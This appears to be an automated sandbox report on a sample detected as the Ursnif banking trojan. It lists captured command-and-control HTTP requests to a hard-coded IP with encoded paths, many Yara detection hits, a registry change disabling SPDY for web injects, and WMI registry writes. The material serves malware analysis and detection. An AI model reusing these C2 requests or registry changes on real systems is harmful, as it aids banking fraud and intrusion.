Source: global traffic	HTTP traffic detected: GET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic	HTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Creates a DirectInput object (often for capturing keystrokes)

Source: loaddll32.exe, 00000001.00000002.511144160.00000000012DB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461902284.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462719900.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.462876303.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461973969.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.463098635.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.461743717.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 3088, type: MEMORYSTR

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	1_2_01C178F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	3_2_031F78F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,	5_2_010578F2

System Summary

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
